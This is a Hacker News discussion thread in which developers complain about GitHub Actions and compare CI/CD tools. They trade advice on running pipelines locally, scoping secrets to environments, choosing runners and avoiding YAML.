Then, have an additional check on CI to verify formatting on all files. That should rarely be triggered, but helps to catch cases where the hooks were not run, for example from external contributes. That also makes it completely fine for this CI step to take a couple of minutes - you don't need that feedback immediately.
hinkley 7 days ago [-]
The tension in any system is how many ways the build can fail other than the most obvious one. So I generally only encourage things in the pre-commit hook like no weird punctuation (I'm looking at you, Microsoft), no empty commit messages, and maybe require a ticket number (or try to guess one out of the branch name).
Though it would be sort of interesting or maybe just amusing if you made something like ssh-agent but for 'git commit' and your test runner. Only allow commits when all files are older than your last green test run.
yeswecatan 7 days ago [-]
Unfortunately people will use --no-verify to bypass hooks.
normie3000 7 days ago [-]
I don't understand commit hooks - they're like binding a macro to the MS Word save button to make it conditional.
chuckadams 7 days ago [-]
> like binding a macro to the MS Word save button to make it conditional
You have no idea how much I'd love that feature. Inasmuch as "save" is still a thing anyway. I don't miss explicit saves in IDEA, I see commit as the "real" save operation now, and I don't mind being able to hook that in an IDE-independent way.
I think the UX of git hooks has been sub-par for sure, but tools like the confusingly named pre-commit are helping there.
sgarland 7 days ago [-]
Because if you haven’t auto-formatted, lined, etc. then it’s a very easy way to do that so you don’t waste time watching CI fail for something stupid like trailing comma placement.
I don’t want to think about formatting, I just want everything to be consistent. A pre commit hook can run those tools for me, and if any changes occurred, it can add them to the commit.
hinkley 7 days ago [-]
There's a long set of steps to making a tool mandatory in a development environment, but the final step should always, always be, "And you will find yourself on a PIP if you refuse to use the mandatory tools."
If people want to die on a hill that is demonstrably causing problems for all of their coworkers then let em.
yeswecatan 7 days ago [-]
Oh how I wish engineering leadership would actually mandate certain things such as this.
hinkley 7 days ago [-]
They always pick the wrong things to mandate don't they.
anttiharju 7 days ago [-]
Enforce on CI. Autofix in pre-commit hooks. Lefthook is fantastic for this.
Then they'll lose time for the same verifications to fail in the PR?
ahub 7 days ago [-]
I don't see sourcehut [0] mentionned here. I tested github and gitlab CI, sourcehut is MILES ahead. I'll drop two key features here :
- any CI run successful or not, gives you back a ssh URI so you can log into the machine to inspect/tweak/tinker
- CI files are NOT in the project's repository. no need to wrangle with your git branches when working on CI anymore
I don't use sourcehut, but interpreting what you wrote I'd argue this is an antifeature and would be a dealbreaker for me. CI typically evolves with the underlying code and decoupling that from the code makes it difficult to go backwards. It loses cohesion.
enriquto 7 days ago [-]
you can put them in the same repository, if that is your thing.
If you put the build files in a .builds/ folder at the root of your repository, they will be run upon each commit. Just like in github or gitlab. You are just not forced into this way of life.
If you prefer, you can store the build files separately, and run them independently of your commits. Moreover, the build files don't need to be associated to any repository, inside or outside sourcehut.
terminalbraid 7 days ago [-]
I see, that is nice. Thank you for the patient explanation.
yoyohello13 7 days ago [-]
My team uses GitLab and most other teams are on Azure dev ops. They keep trying to get us to switch telling us how amazing pipelines are. Glad to know we are not missing anything.
Xiol32 7 days ago [-]
Having recently been involved in a Gitlab to ADO migration, keep fighting the fight. It is such a step backwards.
Azure DevOps seems extremely basic (and flaky!) compared to GitLab. My impression is from a couple of years ago though; perhaps it's amazing now.
LilBytes 7 days ago [-]
ADO is painful, GitHub has its warts but it's got much more community support from services like depot.dev and others.
lxe 7 days ago [-]
Should have been zero permissions by default. The current model is a mess of global settings, workflow permissions, and job tokens that nobody understands.
quantadev 7 days ago [-]
GitHub Actions is just a way to build a remote single point of failure into your pipeline. I don't get why people do this. If GitHub goes down, or has problems for whatever reasons it can interfere with your deliverables to customers. I learned early in my career not to trust 3rd parties as any part of any mission critical process. 3rd parties will always fail you, it's just a matter of time.
kelseydh 7 days ago [-]
With widespread dependencies like AWS or Github, if they go down.. you benefit from everybody else also going down. Downtime of that kind means a lot of media coverage and an easier/more understanding conversation with your affected customers.
The worst kind of downtime is when you go down but nobody else has.
neuroelectron 6 days ago [-]
Is your argument, literally, "everybody else is doing it?"
quantadev 6 days ago [-]
I think it was all about "having excuses" for one's bad decisions, to avoid taking responsibility. lol.
quantadev 7 days ago [-]
[flagged]
zzo38computer 7 days ago [-]
I only use GitHub Actions for auto assigning issues (and I never merge pull-requests directly; I will always handle pull-requests manually). Here is the entire file:
I set the permissions to only allow writing to issues and pull-requests (so that if gh is modified to do malicious things (or has a security flaw that allows it to do malicious things even if not intended), it cannot affect anything other than issues and pull-requests). As far as I can tell from the documentation, this is correct (although can do things other than add assignees, and it does not seem that it can be set more finely), but if I am wrong then you can tell me that I am wrong.
Documentation for GitHub Actions says, "If you specify the access for any of these permissions, all of those that are not specified are set to none." The article says "I do think a better "default" would be to start with no privileges and require the user to add whatever is needed", and it would seem that this is already the case if you explicitly add a "permissions" command into your GitHub Actions file. So, it would seem that the "default permissions" are only used if you do not add the "permissions" command, although maybe that is not what it means and the documentation is confusing; if so, then it should be corrected. Anyways, you can also change the default permission setting to restrictive or permissive (and probably ought to be restrictive by default).
Allowing to set finer permissions probably would also help.
stephencoxza 7 days ago [-]
Not sure if I'm the odd one out here. I thoroughly enjoy making the best of whatever the company wants to use. The flavour of CI/CD can be a debate similar to programming languages
darkwater 7 days ago [-]
I think it's even worse. Just like ticketing systems, people love to sunk on CI/CD because it's out of the scope of their primary focus (writing software) so having to deal with it is a PITA. The only CI/CD system most people like are the ones that are almost invisible.
neycoda 7 days ago [-]
1st mistake: rebasing in CI.
Stop rebasing.
This should only happen if absolutely necessary to fix major merge mistakes.
Rebasing changes history and I've seen more problems prevented from removing it as a CI strategy.
Every CI strategy I've seen relying on rebasing had a better alternative in SDLC. You just need to level up your project management, period.
wordofx 7 days ago [-]
GHA feels like a discontinued product that people use so they can’t switch it off.
webworker 7 days ago [-]
Yeah, between the two, I strongly prefer BitBucket Pipelines. Feels much cleaner.
jiggawatts 7 days ago [-]
Azure DevOps is nearly identical, but with slightly different zoo of issues that are less well documented in public sources.
It also has the problem of not having a local dev runner for actions. The "inner loop" is atrociously slow and involves spamming your colleagues with "build failed" about a thousand times, whether you like it or not.
IMHO, a future DevOps runner system must be an open-source, local-first. Anything else is madness.
Right now we're in the "mainframe era" of DevOps, where we edit text files in baroque formats with virtually no tooling assistance, "submit" that to a proprietary batch system on a remote server that puts it into a queue... then come back after our coffee to read through the log printout.
I should buy a dot matrix printer to really immerse myself into the paradigm.
asmor 7 days ago [-]
They are so identical, there's code in the GitHub runner to search and replace "Azure DevOps" with "GitHub Actions" in log output on the fly.
The entire code is a wonderful mess. We found that when we early-adopted ephemeral runners, that the control flow is full of races and the status code you get at the end is indicative of exactly nothing. So even if the backend is just having a hickup picking up a job with an obscure Azure error code, you better just throw that entire VM away, because you can't know if that runner will ever recover or has already done things to break the next run.
rochacon 7 days ago [-]
The current version of GHA is "Azure DevOps v3".
IIRC, it came after Microsoft purchased GitHub and I think it was part of a plan to discontinue/kill Azure DevOps altogether in favor of GitHub. I don't think they have feature parity yet, specially on the issues and permissioning parts.
Although, I never saw a public announcement of this discontinuation, ADO is kind of abandoned AFAICT and even their landing page hints to use GitHub Enterprise instead [1].
We recently discover that if the last person to change cron __schedule__ of the workflow is removed from the organization, workflow fails with cryptic errors.
It turns out, the last person to change cron __schedule__ (not the workflow file in general) is an 'actor' associated with this workflow. Very, very confusing implementation. Error messages are even more confusing - workflow runs are renamed as "{Unknown event}" and the message is "Email is unverified".
Things like this are why I hate having to use PATs in workflows. What if I leave the company? I’ll leave a wake of broken actions in my wake. I do not like that at all, a huge point of CI/CD is automation, reproducibility, and NOT being dependent on specific developers/machines.
quesera 7 days ago [-]
I believe this is a good use for a GitHub machine account.
IIRC, GitHub recommends this practice in their docs, with a username of "YOUR_USERNAME-machine".
The machine user is just an ordinary GitHub user, added as a member of the organization, with all the necessary repo permissions, and a generated access token added to the GH repo Secrets. The organization owner then manages this GH machine account as well as the org, and their own personal (or work) login account.
We have not hit any rate limiting so far, but we're a relatively small team -- a dozen devs, a few hundred commits per day that trigger CI (we don't do CD), across half a dozen active repos.
goosejuice 7 days ago [-]
After using Gitlab CI for years and setting up some pretty complex scenarios, when I switched over to GitHub I found the UX to be pretty rough. Seems very opaque and I find the documentation to be at best hard to navigate.
Maybe it was just the pain of switching but that was my initial impression.
heldrida 6 days ago [-]
GitHub actions provide me the best experience I ever encountered when dealing with ops.
I pair it with bash scripts where I find important to run outside GitHub facilitating test and maintenance.
Although, I still find need to run multiple times or iterate over the actual GitHub action run time, which is a bit slow to iterate but find it best to catch any issues. If the dev feedback loop fixed it save me a lot of precious time. I know there’s a third party to run locally but it’s not the same…
Thus, bash scripting is great due to portability.
actinium226 7 days ago [-]
As another commenter said, it's good to write as much CI logic outside the yaml file as possible.
I take this a step further and approach CI with the mentality that I should be able to run all of my CI jobs locally with a decent interface (i.e. not by running 10 steps in a row), and then I use CI to automate my workflow (or scale it, as the case may be). But it always starts with being able to run a given task locally and then building CI on top of it, not building it in CI in the first place.
dilawar 7 days ago [-]
If you are annoyed by gitlab-runner deprecating run command that I used to run pipelines locally, there is https://github.com/firecow/gitlab-ci-local . But it also opened my eyes to benefita of having runner invariant pipelines -- pipelines written in solution agnostic way. Use bash, make, just, doit or whatever.
Nothing beats having a single script to bootstrap and run the whole pipeline e.g. `make ci`.
fourteenminutes 7 days ago [-]
Used to use GH actions quite a bit. At my current company we set up RWX Mint (rwx.com/mint) and haven't looked back. (disclaimer: used to work at rwx but no longer affiliated)
lars512 7 days ago [-]
At Our World In Data we ended up using Buildkite to run custom CI jobs, integrated with GitHub, but on cheap, massive Hetzner machines. I can really recommend the experience!
youdont 7 days ago [-]
When GitHub actions are stopped GitHub just goes straight for the nuclear SIGKILL. No, asking nice first with a SIGTERM...
This means that for anything that needs to gracefully cancel, like for example terraform, it's screwed.
Want to cancel a run? Maybe you've got a plan being generated for every commit on a branch, but you push an update. Should be ok for GitHub to stop the previous run and run the action for the updated code, right? WRONG! That's a quick way to a broken state.
joshstrange 7 days ago [-]
> Why do I need a custom token? Because without it, the release completes, but doesn't trigger our post-release workflow.
This is so frustrating. Having to inject a PAT into the workflow just so it will kick off another workflow is not only annoying but it just feels wrong. Also not lots of operations are tied to my user which I don't like.
> It doesn't help that you can't really try any of this locally (I know of [act](https://github.com/nektos/act) but it only supports a small subset of the things you're trying to do in CI).
This is the biggest issue with GH Actions (and most CIs), testing your flows locally is hard if not impossible
All that said I think I prefer GH Actions over everything else I've used (Jenkins and GitLab), it just still has major shortcomings.
I highly recommend you use custom runners. The speed increase and cost savings are significant. I use WarpBuild [0] and have been very happy with them. I always look at alternatives when they are mentioned but I don't think I've found another service that provides macOS runners.
Just flagging that Depot now has macOS and Windows runners [0] as well if you're looking for even faster builds. I also recognize that constantly reevaluating runners isn't on everyone's priority list.
If you have complex multi-step actions I recommend tools like nx (for frontend projects) or Bazel. It massively simplifies caching parts of your CI workflows and works locally too.
We have a very complicated build process in my current project, but our CI pipelines are actually just a couple of hundred of lines of GHA yaml. Most of which are boilerplate or doing stuff like posting PR comments. The actual logic is in NX configuration.
kelseydh 7 days ago [-]
We recently had a developer -- while trying to debug container builds for a version upgrade for a PR on their local branch -- accidentally trigger a deployment of their local branch's docker container to production (!) while messing around with Github action workflow files in their pull request (not main).
Outside of locking down edit access to the .github workflow yml files I'm not sure how vulnerabilities like this can be prevented.
carderne 7 days ago [-]
Your prod deployment should require access to some secrets that are only available to workflows running against main.
kelseydh 7 days ago [-]
I'm interested in learning more about this. How would we go about adding a secret only available to runners on the main branch? Is there a configuration option on Github to create a secret only available to runners on main?
Presumably anything configured via a .github workflow wouldn't assure safety, as those files can be edited to trigger unexpected actions like deploys on working branches. Our Github Action workflow yml file had a check to only deploy for changes to the main branch. The deploy got triggered because that check got removed from the workflow file in a commit on a working branch.
carderne 7 days ago [-]
The docs here [0] do a decent job explaining it.
You create an environment, restrict it to the main branch, add your secret to it and then tie your deploy workflow to it.
If someone runs that workflow against another branch it will run but it won’t be able to access those secrets.
I haven't used it but the GitHub Environments feature allows setting Secrets by Environment. Costs extra $ tho.
But for actually good security CI and CD should be different tools.
LilBytes 7 days ago [-]
Yeah it's a difficult problem, templates help, then put the templates into another repo that is managed by a specific person and imported into others. Not sure how that work in a monorepo, I expect those controls wouldn't.
The problem is it's still possible to work around those controls unless you create some YAML monstrosity that stops people from making the mistake in the first place.
jonenst 7 days ago [-]
I'm surprised the author doesn't mention environment secrets, which I think currently are the only way to avoid that anyone with push access to any repo also gets full access to all secrets (by pushing a new workflow file and triggering it). This makes org and repo secrets practically useless for any team where only admins or maintainers should have access to secrets.
suryao 7 days ago [-]
There definitely are a ton of issues with GitHub actions. To add to the OP's list:
- Self-hosting on your aws/gcp/azure account can get a little tricky. `actions-runner-controller` is nice but runs your workflows within a docker container in k8s, which leads to complex handling for isolation, cost controls because of NAT etc.
- Multi-arch container builds require emulation and can be extremely slow by default.
- The cache limits are absurd.
- The macos runners are slow and overpriced (arguably, most of their runners are).
Over the last year, we spent a good amount of time solving many of these issues with WarpBuild[1]. Having unlimited cache sizes, remote multi-arch docker builders with automatic caching, and ability to self-host runners in your aws/gcp/azure account are valuable to minimize cost and optimize performance.
I've run into similar pain points with GitHub Actions in past roles but I still very much use them/get value. One approach that's helped us at Flox is indeed using Nix and we've now seen customers start leveraging that. Significant drop in “works on my machine” issues and more reliable CI pipelines, etc... It’s not a silver bullet, but it offers a solid technical foundation for tackling these challenges.
On the Flox side we are very much on the integrate and improve rather than full replace for scenarios like this one <3
Happy to answer any Nix items on this!
sontek 7 days ago [-]
I'm surprised that they were already using earthly and decided not to continue using it inside github actions. That is my favorite pattern so that what github actions is doing is the same as what I'd do locally. No `act` necessary:
I am really really hoping that someone (not me, I've already tried and failed) could slim it down into a single-purpose, self-contained, community maintainable tool ...
netvarun 7 days ago [-]
Dagger (https://dagger.io) recently seems to have reinvented/rebranded itself as some llm agent platform.
sepositus 7 days ago [-]
Oh no...this must have been recent. DevOps is hitting peak enshitification. I didn't have a plan B.
I just don't understand why people have gone down this ci in the cloud train. I've been using some form of build scripts locally and then just extended that to run on jenkins as a standard flow for the longest time and reproducibility is key. It always will be. If you just have a generic script or tool that builds your project and people can just pick it up and read it then it's going to be way easier to adopt and debug. Stop trying to use platforms with a dsl, with breaking down pieces in their proprietary way. It makes no sense.
klysm 7 days ago [-]
Write a script that works anywhere and execute it via your ci tooling as a thin wrapper
rodolphoarruda 7 days ago [-]
Sidenote --
What a cool looking website. What kind of tool do you need to create those animations?
orliesaurus 7 days ago [-]
I am building Toolhouse.ai and I've had headaches with Github actions but luckily I ask the AI to help out when I am trying to do something.
My biggest annoyance is that it's oddly hard to debug things without running it. Even the Github Actions syntax helper on VSCode isn't super helpful. I have recently discovered `act`[1] and I will be investing time to using it because it really * hopefully * makes a difference.
I try to use as little of GHA specific things as possible. Use it as a runner but don't lock yourself into the platform. I want to be able to develop and run the CI outside GHA thank you very much.
_rm 6 days ago [-]
It seems that whenever something becomes good enough to become popular, you start the clock on people starting to write about how it's the worst thing ever.
solosito 4 days ago [-]
Did you consider Pkl instead of Yaml to write your GitHub actions?
If you want an easy solution for GitHub Actions security, check out Garnet.ai (formerly listen.dev). They were built for GitHub first. And it’s free for single projects - https://dashboard.listen.dev/.
belikebakar 6 days ago [-]
Does it allow to integrate directly into the action runner?
fkjadoon94 6 days ago [-]
Yes, its a one step integration into your workflow file, typically before the steps you want to monitor eg. build, test if you don't want to see everything happening in your runner host. It has worked pretty well with ubuntu-latest and stock Linux runners from GH out of the box.
fkjadoon94 6 days ago [-]
The integration basically wraps *jibril - a single binary linux edr which allows for detection and enforcement in the runner
Worst part of GitHub Actions? Its encouragement of the total misuse of containers as what have essentially become installer scripts - complete with all the flakiness you'd imagine.
Go look at your workflows and see how much of the runtime is spent running installers upon installers for various languages, package managers and so on. Containers were not supposed to be like this.
dzogchen 7 days ago [-]
Well the default GitHub images come with the kitchen sink, so for most projects you don’t need to install much if anything.
ris 7 days ago [-]
Yeah sure if you want to get zero guarantees about any of the versions of anything you're getting.
msy 7 days ago [-]
On a related note - how are people tracking the absolute thicket of permissions quirks that is Github's various secrets, tokens & repo permissions?
packetlost 7 days ago [-]
Most "CI" platforms suck in some way. I attribute it to a mix of misaligned incentives (less efficient pipelines, more premium-rate CPU cycles to resell, lockin, etc.) and the fact that it's actually just a hard problem.
I've found Actions and Codespaces to be different from one another. Actions once recently came with a borked gcc compiler, which failed to build some code that was fine before, and there was no convenient way to debug this. As in no way for me to spin up exactly the same GH Actions environment in Codespaces.
Why not align these tools? Then there might be less pain. What a good idea.
kfarr 7 days ago [-]
I was updating an old action last night to update gh pages and it’s from peaceiris. And it’s not bad, it did the job. But it feels kinda weird.
sam_bristow 6 days ago [-]
Modern CI tends to grow features until it's reproduced the all the features of a build system. You then end up with the actual logic of your build smeared across mutiple layers. Or contorting your CI setup to allow the build system to do caching etc properly.
grav 7 days ago [-]
At [previous company], we initially required branches to be up to date with main.
Since it was a relatively big mono repo, it slowed down productivity quite a bit.
Eventually we tried dropping that requirement and instead relied on testing main before deploying to production. It sped us up again, and main never broke because of bad merges while I was there.
danfritz 7 days ago [-]
Not my experience, I have done fairly complex things like building / releasing a whitelabel ios and android app which is branded in ci per customer.
Like othes have suggested, keep the actions simple by having lots of scripts which you can iterate on locally and making the actions dump to just run the scripts
cantagi 7 days ago [-]
I have a problem with the Github Actions documentation. There is a lot of it, but it feels as though it was written from a "product" perspective, to explain how to use the product.
None of it usefully explains how GHA works from the ground up, in a way that would help me solve problems I encounter.
stuff4ben 6 days ago [-]
I still love my Jenkins Pipelines, Groovy shared libraries, and Bash scripts. It may be old, the UI may be a little crusty, but it's well understood, it just works, and I don't think much about the tool anymore.
jamesu 7 days ago [-]
One thing I found useful was writing a runner for giteas actions CI which is similar to GHA. When you dig down and ask "what is ACTUALLY happening to run this job" then a lot of things such as the docker entrypoint not being modifiable make perfect sense.
gjohnhazel 7 days ago [-]
This was actually an extremely valuable article for me. I was unaware of act, the tool to test GH workflows, and your personal flow of using a separate branch to troubleshot the yaml code makes perfect sense.
TheRealPomax 7 days ago [-]
Is there a decent setup that one can run on their own server(s) instead? Because I'd much rather have a dedicated server sitting in a closet connected to fiber whose only job it is to be a CI runner.
Yep, after spending a few years with gitlab pipelines, my company started migrating over to dagger roughly mid-2024.
We moved to dagger to get replicable local pipeline runs, escape the gitlab DSL, and get the enormous benefits of caching.
We have explicitly chosen to avoid using the "daggerverse", and with that the cross-language stuff. Reason being that it makes modifying our pipeline slower and harder -- the opposite of the reason we moved to dagger.
So we use the Dagger python API to define and run our CI builds. It's great!
Like the other comments on this page about dagger, the move to "integrate AI" is highly concerning. I am hopeful that they won't continue down this path, but clearly the AI hype bubble is strong and at least some of the dagger team are inside it.
I'm speculating that if the dagger team doesn't drop the AI stuff, then the dagger project will end. A fork will pop-up and we'll move to using that. Not an expert (yet!) in the buildkit API, but it seems like the stuff we're benefiting from with dagger is really just a thin wrapper around buildkit. So potentially not too challenging to create a drop-in replacement if necessary later.
AtNightWeCode 7 days ago [-]
Github Actions are simple things for tasks. I do btw also not like them.
But, there are so many red flags in this post. Clearly this corp does not know how to build, test and release professional software.
usrme 7 days ago [-]
To get around the horror that is YAML, I wholeheartedly recommend writing GitHub workflows in CUE and generating the required YAML out of them. I'm hopefully never going back to writing YAML myself!
glandium 7 days ago [-]
I'll take on the occasion to ask the HN crowd: have you noticed that caches, on top of being limited to 10GB, don't seem to expire as advertized, in a LRU manner?
sylware 6 days ago [-]
On the pain side: is it "official" that github issues cannot be posted anymore with noscript/basic (x)html browsers?
acedTrex 7 days ago [-]
Github is too busy dumping all their engineering power into more useless copilot features than actually doing anything to improve their platform.
a1o 7 days ago [-]
I really urge people to try Cirrus CI, it's almost unknown but it has pretty amazing features!
itissid 7 days ago [-]
I can relate to this pain. Isn't gitlab CI better at this especially the documentation and simplicity of it?
toastal 7 days ago [-]
I can’t believe Forgejo ever thought it was a good idea to try & copy this nonsense. Rather than trying to be some FOSS MS GitHub clone, why not pitch that they can do things better—such as not having YAML spaghetti for CI.
I hope Actions stays bad tho. We need more folks to get off proprietary code forges for their open source projects—& a better CI + a better review model (PRs are awful) are 2 very low-hanging fruit that would entice folks off of the platform not for the philosophical reasons such as not supporting US corporations or endangering contributor privacy by making them agree to Microsoft’s ToS, but for technical superiority on the platform itself.
r3tr0 7 days ago [-]
we are working on a platform https://yeet.cx that lets you audit github actions pretty easily.
you just activate some probes and write SQL queries to sift through the information.
neuroelectron 6 days ago [-]
Building in the cloud seems like the worst possible thing you could do.
1a527dd5 7 days ago [-]
I just wish the default wasn't bash. GHA with pwsh is a much better experience.
ramesh31 7 days ago [-]
Half these problems and complexity could be solved with precommit hooks.
7 days ago [-]
eYrKEC2 7 days ago [-]
Has anyone used argo on kubernetes to automate their CI pipeline?
K3UL 7 days ago [-]
As someone who's been using it at very large scale, I still miss gitlab but I think they are not that bad.
But two major pains I did not see : the atrocious UI and the pricing.
Their pricing model goes against any good practice, as it counts a minute for any job even if it runs for 2 seconds. Let's say you run 100jobs in parallel and they all take 30sec. You will pay 100 minutes instead of 50. Now translate this to an enterprise operating at a big scale and I assure you have seen crazy differences between actual time and billable time.
bob1029 7 days ago [-]
Keeping the tech stack simple helps a lot with the CI/CD space. I still prefer to use custom tools that are part of the project source so I don't get locked in. This is like EC2 vs FaaS for me. I'll take the vanilla abstraction please.
Most of the time, I'm just running dotnet build to a zip file and s3 bucket. Then, some code or script picks it up on the other side. Things get much trickier when you're using multiple services, languages, runtimes, database technologies, etc.
Off-topic but DALL-E has turned the web into slop-city. What a mess. Everything looks the same, cheap and ugly and stupid.
rsanheim 7 days ago [-]
tldr but: don't use GitHub Actions. Its a mess, the availability is often atrocious, and the UI around it is _still_ as clunky as when they first rolled it out many years ago.
There are better solutions out there.
asmor 7 days ago [-]
GitHub Actions is like Microsoft Teams. Nobody who knows better wants to use it, but it's slightly better than what most did before (email/jenkins/nothing) and came with the thing you're already using. At least your boss thinks it's better. And it's such a good deal!
ibejoeb 7 days ago [-]
Does anyone think GHA is better than Jenkins?
I was doing things more than 20 years ago in Hudson that GHA can't do now.
everfrustrated 7 days ago [-]
>Does anyone think GHA is better than Jenkins?
A 1000% yes, because it means the default experice most devs have of CI is using ephemeral runners which is a massive win for security and build rot.
Every company I've worked at with stateful runners was a security incident begging to happen, not to mention builds that would do different things depending on what runner host you got placed on (devs manually installing different versions of things on hosts, etc)
williamDafoe 7 days ago [-]
Does anyone use GHA - full stop? Their stuff seems "me too" in most cases, they are definitely a follower, like microsoft Bing search ... google AI ...
ashishb 7 days ago [-]
> There are better solutions out there.
And what are those?
rsanheim 7 days ago [-]
CircleCI.
mscrivo 7 days ago [-]
To expand on this, CircleCI lets you easily ssh into a run so you can debug it as if you were debugging it on your own machine. I cannot tell you how many times this has saved me countless hours because you don't need to wait for your changes to build and then subsequently fail repeatedly, drastically shortening the iteration cycle.
ashishb 7 days ago [-]
I used to use circle CI earlier.
GitHub Actions was an upgrade for me.
rattray 6 days ago [-]
why?
ashishb 5 days ago [-]
GitHub Actions, at least at that time, had a lot more coverage than circle CI.
Anda a lot more flexibility in terms of what can you do.
throwaway984393 7 days ago [-]
Drone.io
KronisLV 7 days ago [-]
Not sure why this was downvoted/flagged, I do use Drone CI myself currently and it's quite pleasant: https://www.drone.io/
There's also the Woodpecker CI fork, which has a very similar user experience: https://woodpecker-ci.org/
When combined with Docker images, it's quite pleasant to use - you define what environment you want for the CI/CD steps, what configuration/secrets you need and define the steps (which can also just be a collection of scripts that you can run locally if need be), that's it.
Standalone, so you can integrate it with Gogs, Gitea or similar solutions for source control and perhaps a bit simpler than GitLab CI (which I also think is lovely, though maintaining on-prem GitLab isn't quite a nice experience all the time, not that you have to do that).
ashishb 7 days ago [-]
Will it last another 2 years?
Several CI systems have come and gone.
williamDafoe 7 days ago [-]
The next time I want to program in YAML (which is NEVER) I'll use GitHub Actions......
cresolutejw 7 days ago [-]
[flagged]
simonw 7 days ago [-]
Definitely not a skill issue if you read the details in their post - https://www.feldera.com/blog/the-pain-that-is-github-actions - they're clearly very experienced with using GitHub Actions and have run into legitimate challenges due to the complexity of what they're using it for.
cresolutejw 7 days ago [-]
I did read the post. The documentation of the product does explain how to use it, so it is unfair to blame the product in my opinion.
simonw 7 days ago [-]
GitHub Actions may cover this stuff in the documentation but it's still difficult to use. That means the product could be designed better (and the documentation could be easier to follow.)
cresolutejw 7 days ago [-]
Why downvote me because there is discourse?
Could we not usually say most software could be documented better. I do not think GitHub Actions ranks near the bottom in terms of documentation and user experience overall. I do understand your point though.
SequoiaHope 7 days ago [-]
It would be more helpful for you to provide the solution rather than just boast about your intelligence.
cresolutejw 7 days ago [-]
The solution was found by the author, and is covered in GitHub actions documentation.
Rendered at 14:58:16 GMT+0000 (Coordinated Universal Time) with Vercel.
After years of dealing with this (first Jenkins, then GitLab, then GitHub), my takeaway is:
* Write as much CI logic as possible in your own code. Does not really matter what you use (shell scripts, make, just, doit, mage, whatever) as long as it is proper, maintainable code.
* Invest time that your pipelines can run locally on a developer machine as well (as much as possible at least), otherwise testing/debugging pipelines becomes a nightmare.
* Avoid YAML as much as possible, period.
* Don't bind yourself to some fancy new VC-financed thing that will solve CI once and for all but needs to get monetized eventually (see: earthly, dagger, etc.)
* Always use your own runners, on-premise if possible
It was a large enterprise CMS project. The client had previously told everyone they couldn't automate deployments due to the hosted platform security, so deployments of code and configs were all done manually by a specific support engineer following a complex multistep run sheet. That was going about as well as you'd expect.
I first solved my own headaches by creating a bunch of bash scripts to package and deploy to my local server. Then I shared that with the squads to solve their headaches. Once the bugs were ironed out, the scripts were updated to deploy from local to the dev instance. Jenkins was then brought in an quickly setup to use the same bash scripts, so now we had full CI/CD working to dev and test. Then the platform support guy got bored manually following the run sheet approach and started using our (now mature) scripts to automate deployments to stage and prod.
By the time the client found out I'd completely ignored their direction they were over the moon because we had repeatable and error free automated deployments from local all the way up to prod. I was quite proud of that piece of gorilla consulting :-)
There's probably a lesson in there.
I swear by TeamCity. It doesn't seem to have any of these problems other people are facing with GitHub Actions. You can configure it with a GUI, or in XML, or using a type safe Kotlin DSL. These all actually interact so you can 'patch' a config via the GUI even if the system is configured via code, and TeamCity knows how to store config in a git repository and make commits when changes are made, which is great for quick things where it's not worth looking up the DSL docs or for experimentation.
The UI is clean and intuitive. It has all the features you'd need. It scales. It isn't riddled with insecure patterns like GH Actions is.
CI is just the thing no one wants to deal with, yet everyone wants to just work. And like any code or process, you need engineering to make it good. And like any project, you can't just blame bad tools for crappy results.
Whereas, I could articulate why I didn't like Jenkins just fine :)
The thing I want to change are things that I do in the build system so that it is checked in and previous versions when we need to build them (we are embedded where field failure is expensive so there are typically branches for the current release, next release, and head). This also means anything that can fail on CI can fail on my local system (unless it depends on something like the number of cores on the machine running the build).
While the details can be slightly different, how we have CI is how it should be. most developers should have better things to do than worry about how to configure CI.
(I don't recall _loving_ it, though I don't have as many bad memories of it as I do for VSTS/TFS, GitLab, GH Actions, Jenkins Groovyfiles, ...)
We needed two more or less completely different configurations for old a new versions of the same software (think hotfix for past releases), but TeamCity can't handle this scenario at all. So now we have duplicated the configuration and some hacky version checks that cancel incompatible builds.
Maybe their new Pipeline stuff fixes some of these short comings.
This is making me realize I want a CI with as few features as possible. If I'm going to spend months of my life debugging this thing I want as few corners to check as I can manage.
I tend to stick with the GUI because if you're doing JVM style work the complexity and tasks is all in the build you can run locally, the CI system is more about task scheduling so it's not that hard to configure. But being able to migrate from GUI to code when the setup becomes complex enough to justify it is a very nice thing.
Any CI product play has to differentiate in a way that makes you dependent on them. Sure it can be superficially nicer when staying inside the guard rails, but in the age of docker why has the number of ways I configure running boring shell scripts gone UP? Because they need me unable to use a lunch break to say "fuck you I don't need the integrations you reserve exclusively for your CI" and port all the jobs back to cron.
And that's why jenkins is king.
If you make anything more than that, your CI will fail. And you can do that with Jenkins, so the people that did it saw it work. (But Jenkins can do so much more, what is the entire reason so many people have nightmares just by hearing that name.)
We build Docker images mostly so ymmv.
I have a "port to github actions" ticket in the backlog but I think we're not going to go down that road now.
You'll have to explain the weird CPS transformations, you'll probably end up reading the Jenkins plugins' code, and there's nothing fun down this path.
Probably 'guerilla', but I like your version more.
Wikipedia: Gorilla Suit: National Gorilla Suit Day:
https://en.wikipedia.org/wiki/Gorilla_suit#National_Gorilla_...
Put the Gorilla back in National Gorilla Suit Day:
https://www.instagram.com/mad.magazine/p/C2xgmVqOjL_/
Gorilla Suit Day – January 31, 2026:
https://nationaltoday.com/gorilla-suit-day/
National Gorilla Suit Day:
https://www.youtube.com/watch?v=N2n5gAN3IlI
You can use Nix with GitHub actions since there is a Nix GitHub action: https://github.com/marketplace/actions/install-nix. Every time the action is triggered, Nix rebuilds everything, but thanks to its caching (need to be configured), it only rebuilds targets that has changed.
> How do you automate running tests and deploying to dev on every push
Nix is a build tool and it's main purpose is not to deploy artifacts. There are however a lot of tools to deploy artifacts built by Nix: https://github.com/nix-community/awesome-nix?tab=readme-ov-f...
Note there are also several Nix CI that can do a better job than a raw GitHub actions, because they are designed for Nix (Hydra, Garnix, Hercules, ...).
> How do you automate running tests
You just build the Nix derivation that runs your tests, e.g. `nix build #tests` or `nix flake check` in your workflow file.
> deploying to dev on every push
You can set up a Nix `devShell` as a staging area for any operations you'd need to perform for a deployment. You can use the same devShell both locally and in CI. You'd have to inject any required secrets into the Action environment in your repository settings, still. It doesn't matter what your staging environment is comprised of, Nix can handle it.
Every CI "platform" is trying to seduce you into breaking things out into steps so that you can see their little visualizations of what's running in parallel or write special logic in groovy or JS to talk to an API and generate notifications or badges or whatever on the build page. All of that is cute, but it's ultimately the tail wagging the dog— the underlying build tool should be what is managing and ordering the build, not the GUI.
What I'd really like for next gen CI is a system that can get deep hooks into local-first tools. Don't make me define a bunch of "steps" for you to run, instead talk to my build tool and just display for me what the build tool is doing. Show me the order of things it built, show me the individual logs of everything it did.
